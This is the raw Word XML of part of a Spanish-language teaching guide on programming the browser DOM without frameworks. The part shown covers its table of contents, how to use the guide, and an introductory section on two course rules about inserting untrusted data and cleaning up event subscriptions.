          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320029 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58168A9F" w14:textId="0D3C7A42"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30" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Si leés una sola cosa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320030 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73D0E3D4" w14:textId="5C6D82C5"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31" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Si leés tres</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320031 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FC135B3" w14:textId="2E0E4B41" w:rsidR="000A5A7F" w:rsidRDefault="000A5A7F">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032" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Las fuentes normativas (para consultar, no para leer de corrido)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320032 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2235ED45" w14:textId="76A00578" w:rsidR="000A5A7F" w:rsidRDefault="000A5A7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033" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Cierre: las siete cosas que hay que recordar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320033 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21E69323" w14:textId="09DC305C" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A7676E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2237A5E7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc239319967"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El DOM: programar la página sin framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4BE45892" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc239319968"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El árbol vivo, los eventos y la memoria, explicados en criollo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="1226C816" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Traducción didáctica del texto académico, sección por sección. Mismos conceptos, otro idioma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6AECF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc239319969"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Antes de empezar: cómo usar esta guía</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6AFD2B97" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Este documento no reemplaza al capítulo original: lo traduce. El académico está escrito en el idioma de los papers, denso y comprimido; esta guía lo desarma y lo cuenta como en un café.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E2B62" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La regla es una sola: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no se pierde ni un concepto.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Si el original dice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>nodo separado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, acá dice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>nodo separado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>; si cita el DOM Living Standard del WHATWG, acá lo cita. Lo que cambia es que además te explico por qué importa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52F4E4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cada sección tiene tres partes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589A1B3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué dice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> — la idea del original, en dos o tres oraciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D25D3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>En criollo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> — la explicación larga, con la analogía que la hace pegar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F70C24E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Para el pizarrón</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> — la frase que te llevás.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DAFC15" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>En las operativas —anatomías, herramientas, seguridad— se va derecho al grano.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7A3AEFF5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="630591FC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>LA IDEA MADRE DE TODO EL CAPÍTULO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BE6103" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Si te quedás con una sola frase, que sea esta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9CA295" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El DOM no es una foto de la página: es la página. Y todo lo que toques ahí queda vivo hasta que vos lo des de baja.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D15F696" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Vivo en los tres sentidos que arman el capítulo: una colección se actualiza sola mientras la recorrés y te arruina el bucle; un manejador sigue registrado aunque el nodo ya no esté en pantalla, y se come la memoria; un dato insertado como marcado pasa a ser código.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA1A4C5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Las dos reglas obligatorias que nacen acá —</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>RN-F02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>RN-F01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>— salen de esa frase, y por eso el capítulo primero muestra el problema andando y recién después da la regla.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42147467" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc239319970"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.1 — De qué se trata esta clase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25C26A90" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc239319971"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué dice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2E7ED34E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Los tres capítulos anteriores dejaron las piezas sobre la mesa: un protocolo que trae documentos, un lenguaje declarativo que decide cómo se ven y un lenguaje que se ejecuta en un solo hilo. Este capítulo las conecta: el DOM es la interfaz por la cual el código del Capítulo 3 modifica el documento del Capítulo 1, y de ahí sale todo lo que en una página se mueve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D2BA1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc239319972"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>En criollo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="26FFA697" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Ninguna de las tres, por separado, mueve una página. Lo que las junta es el DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6C64C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Sacate de encima la objeción que vas a tener: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el TPI te prohíbe React, Vue o cualquier framework de interfaz.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parece un capricho y no lo es. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Sin un framework de por medio quedás obligado a entender qué hace el navegador de verdad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, porque un framework tapa justo lo que este capítulo estudia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71122A79" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">De las once reglas obligatorias del TPI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dos nacen acá</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, y a las dos las vas a ver demostradas antes de que nadie te las enuncie:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="3006"/>
        <w:gridCol w:w="3006"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="47A086AE"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0F44E21" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Regla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76630AA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>De qué habla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665BA15" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Dónde la vas a ver antes de leerla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="257C147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45B8CE3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>RN-F02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7738CBD6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cómo se insertan los datos que no generó tu código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58F0B5D2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.7: un ataque funcionando en veinte líneas. Después de eso no necesita defensa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="2A41584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42A6856" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RN-F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09F160D2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué hacer con una suscripción al desmontar la vista</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C1C06E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.9: una página comiéndose la memoria, apoyada en las clausuras del Capítulo 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E49AE0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un tercer tema atraviesa todo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el DOM es lento.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> No el lenguaje: la interfaz. Cada modificación puede obligar a recalcular la geometría, y hacerlo en un bucle produce el bloqueo del hilo único del Capítulo 3 (4.10).</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30AEA459" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="08163941" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>PARA EL PIZARRÓN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="579F16BA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El objetivo es concreto y medible: al terminar tenés que poder construir una interfaz que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>agregue y quite elementos, responda a eventos y se desmonte sin dejar nada atrás</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D37CC8B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Ojo con lo último: es lo que separa una demo de una aplicación. Montar es fácil. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Desmontar bien es lo difícil, y este capítulo te enseña a verificarlo con el panel de memoria.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36E3B87C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc239319973"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.2 — Por qué existe el DOM: el problema que vino a resolver</w:t>
      </w:r>
